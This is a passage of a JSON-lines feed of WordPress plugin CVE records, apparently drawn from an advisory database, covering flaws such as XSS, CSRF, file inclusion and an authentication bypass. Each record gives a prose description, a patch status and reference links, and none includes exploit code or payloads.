{"CVE_ID":"CVE-2025-1436","slug":"limit-bio","versionImpact":"1.0","description":"The Limit Bio WordPress plugin through 1.0 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/849ed0a0-be17-43cf-a3a1-ad54dfb33d57\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/849ed0a0-be17-43cf-a3a1-ad54dfb33d57\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4199","slug":"abundatrade-plugin","versionImpact":"1.8.02","description":"The Abundatrade Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.8.02. This is due to missing or incorrect nonce validation on the 'abundatrade' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abundatrade-plugin\\\/tags\\\/1.8.02\\\/abundatrade_pugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abundatrade-plugin\\\/tags\\\/1.8.02\\\/abundatrade_pugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/abundatrade-plugin\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/abundatrade-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef828667-f241-4c5c-92a8-0a4f366e190f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef828667-f241-4c5c-92a8-0a4f366e190f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4585","slug":"irm-newsroom","versionImpact":"1.2.17","description":"The IRM Newsroom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'irmflat' shortcode in all versions up to, and including, 1.2.17 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/irm-newsroom\\\/trunk\\\/irm-newsroom.php#L439\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/irm-newsroom\\\/trunk\\\/irm-newsroom.php#L439\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0da6d357-e55f-4bf6-9cd7-50e3dc712434?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0da6d357-e55f-4bf6-9cd7-50e3dc712434?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7669","slug":"avishi-wp-paypal-payment-button","versionImpact":"2.0","description":"The Avishi WP PayPal Payment Button plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0. This is due to missing or incorrect nonce validation on the 'avishi-wp-paypal-payment-button\/index.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/avishi-wp-paypal-payment-button\\\/trunk\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/avishi-wp-paypal-payment-button\\\/trunk\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/avishi-wp-paypal-payment-button\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/avishi-wp-paypal-payment-button\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8416b394-28ae-41de-8784-2ae39f4d201f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8416b394-28ae-41de-8784-2ae39f4d201f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7507","slug":"elink-embed-content","versionImpact":"1.1.0","description":"The elink \u2013 Embed Content plugin for WordPress is vulnerable to Malicious Redirect in all versions up to, and including, 1.1.0. This is due to the plugin not restricting URLs that can be supplied through the elink shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to supply an HTML file that can be leveraged to redirect users to a malicious domain.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elink-embed-content\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elink-embed-content\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bda249f7-07a9-47ba-bba4-85abd8f8a207?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bda249f7-07a9-47ba-bba4-85abd8f8a207?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1421","slug":"ht-mega-for-elementor","versionImpact":"2.4.4","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018border_type\u2019 attribute of the Post Carousel widget in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a71cbe66-4187-4260-bb87-8579bc6e75f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a71cbe66-4187-4260-bb87-8579bc6e75f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/includes\\\/widgets\\\/htmega_post_carousel.php#L2243\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/includes\\\/widgets\\\/htmega_post_carousel.php#L2243\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3945","slug":"wp-todo","versionImpact":"1.3.0","description":"The WP To Do plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.0. This is due to missing or incorrect nonce validation on the wptodo_manage() function. This makes it possible for unauthenticated attackers to add new todo items via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69475bec-1f27-4793-8697-1132ac701c62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69475bec-1f27-4793-8697-1132ac701c62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L273\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L273\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3965","slug":"pray-for-me","versionImpact":"1.0.4","description":"The Pray For Me WordPress plugin through 1.0.4 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e1ba2b3-5849-42f6-b503-8b3b520e4a79\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e1ba2b3-5849-42f6-b503-8b3b520e4a79\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4100","slug":"elfsight-pricing-table","versionImpact":"2.0.1","description":"The Pricing Table plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.1. This is due to missing or incorrect nonce validation on the ajax() function. This makes it possible for unauthenticated attackers to perform a variety of actions related to managing pricing tables via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cb3d2d4-256c-4128-9397-8b9c7be1b9c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cb3d2d4-256c-4128-9397-8b9c7be1b9c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elfsight-pricing-table\\\/trunk\\\/core\\\/includes\\\/widgets-api.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elfsight-pricing-table\\\/trunk\\\/core\\\/includes\\\/widgets-api.php#L71\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8858","slug":"addons-for-elementor","versionImpact":"8.5","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018piechart_settings\u2019 parameter in all versions up to, and including, 8.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3c2e5fe-cc02-479e-9f33-e1a783088596?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3c2e5fe-cc02-479e-9f33-e1a783088596?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/piecharts\\\/loop.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/piecharts\\\/loop.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153346\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153346\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8921","slug":"zita-site-library","versionImpact":"1.6.3","description":"The Zita Elementor Site Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc1c76ee-078d-4c9a-a4d3-063d9147d7e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc1c76ee-078d-4c9a-a4d3-063d9147d7e8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zita-site-library\\\/trunk\\\/importer\\\/wxr-importer.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zita-site-library\\\/trunk\\\/importer\\\/wxr-importer.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zita-site-library\\\/trunk\\\/inc\\\/importer.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zita-site-library\\\/trunk\\\/inc\\\/importer.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zita-site-library\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zita-site-library\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpzita.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpzita.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168327\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168327\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10898","slug":"cf7-email-add-on","versionImpact":"1.9","description":"The Contact Form 7 Email Add on plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9 via the cf7_email_add_on_add_admin_template() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php files can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-email-add-on\\\/trunk\\\/include\\\/class-cf7-email.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-email-add-on\\\/trunk\\\/include\\\/class-cf7-email.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d82efaa3-ea61-476c-ad1a-60585450c63a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d82efaa3-ea61-476c-ad1a-60585450c63a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12113","slug":"youzify","versionImpact":"1.3.2","description":"The Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the delete_user_review() and delete_review() functions in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete other users' reviews.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/youzify\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/youzify\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/977e407c-0650-454f-98bd-b39bb8c8c61f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/977e407c-0650-454f-98bd-b39bb8c8c61f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13678","slug":"r3w-instafeed","versionImpact":"1.0","description":"The R3W InstaFeed WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba759796-a152-4f13-a474-f0368b4bc1f6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba759796-a152-4f13-a474-f0368b4bc1f6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1401","slug":"wp-click-info","versionImpact":"2.7.4","description":"The WP Click Info WordPress plugin through 2.7.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/072620a2-76db-49d2-aae5-1170c409f7e7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/072620a2-76db-49d2-aae5-1170c409f7e7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4198","slug":"alink-tap","versionImpact":"1.3.1","description":"The Alink Tap plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on the 'alink-tap' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alink-tap\\\/trunk\\\/admin\\\/views\\\/admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alink-tap\\\/trunk\\\/admin\\\/views\\\/admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alink-tap\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alink-tap\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c856e06d-34f7-42e9-a72c-3d4e9207e07e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c856e06d-34f7-42e9-a72c-3d4e9207e07e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4584","slug":"irm-newsroom","versionImpact":"1.2.17","description":"The IRM Newsroom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'irmeventlist' shortcode in all versions up to, and including, 1.2.17 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/irm-newsroom\\\/trunk\\\/irm-newsroom.php#L494\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/irm-newsroom\\\/trunk\\\/irm-newsroom.php#L494\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3895df7a-9f24-45a5-b447-16f214cfbfcc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3895df7a-9f24-45a5-b447-16f214cfbfcc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7661","slug":"martinus-partnersky-system","versionImpact":"1.7.1","description":"The Partnersk\u00fd syst\u00e9m Martinus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'martinus' shortcode in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/martinus-partnersky-system\\\/tags\\\/1.7.1\\\/martinus-pp.php#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/martinus-partnersky-system\\\/tags\\\/1.7.1\\\/martinus-pp.php#L266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6500b559-4c26-47e8-b131-100ece3ca3bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6500b559-4c26-47e8-b131-100ece3ca3bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5844","slug":"radius-blocks","versionImpact":"2.2.1","description":"The Radius Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018subHeadingTagName\u2019 parameter in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/radius-blocks\\\/tags\\\/2.2.1\\\/templates\\\/blocks\\\/advanced-heading\\\/layout.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/radius-blocks\\\/tags\\\/2.2.1\\\/templates\\\/blocks\\\/advanced-heading\\\/layout.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/radius-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/radius-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff41796a-0ba8-468f-8b79-274064da154e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff41796a-0ba8-468f-8b79-274064da154e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36713","slug":"mstore-api","versionImpact":"2.1.5","description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.1.5. This is due to unrestricted access to the 'register' and 'update_user_profile' routes. This makes it possible for unauthenticated attackers to create new administrator accounts, delete existing administrator accounts, or escalate privileges on any account.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-fixed-in-wordpress-mstore-api-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-fixed-in-wordpress-mstore-api-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-mstore-api-security-bypass-2-1-5\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-mstore-api-security-bypass-2-1-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/934c3ce9-cf2d-4bf6-9a34-f448cb2e5a1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/934c3ce9-cf2d-4bf6-9a34-f448cb2e5a1d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5085","slug":"advanced-menu-widget","versionImpact":"0.4.1","description":"The Advanced Menu Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'advMenu' shortcode in versions up to, and including, 0.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-menu-widget\\\/trunk\\\/class-advanced-menu-widget.php?rev=1471917#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-menu-widget\\\/trunk\\\/class-advanced-menu-widget.php?rev=1471917#L74\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5da2dac6-940c-419e-853f-6cfd5d53d427?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5da2dac6-940c-419e-853f-6cfd5d53d427?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1397","slug":"ht-mega-for-elementor","versionImpact":"2.4.6","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's blocks in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on the 'titleTag' user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ac66027-14b8-4e0a-a483-c014905ef04e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ac66027-14b8-4e0a-a483-c014905ef04e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/cta\\\/index.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/cta\\\/index.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/info-box\\\/index.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/info-box\\\/index.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/section-title\\\/index.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/section-title\\\/index.php#L89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/team\\\/index.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/team\\\/index.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/testimonial\\\/index.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/testimonial\\\/index.php#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/accordion-card\\\/index.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/htmega-blocks\\\/src\\\/blocks\\\/accordion-card\\\/index.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3048999%40ht-mega-for-elementor&new=3048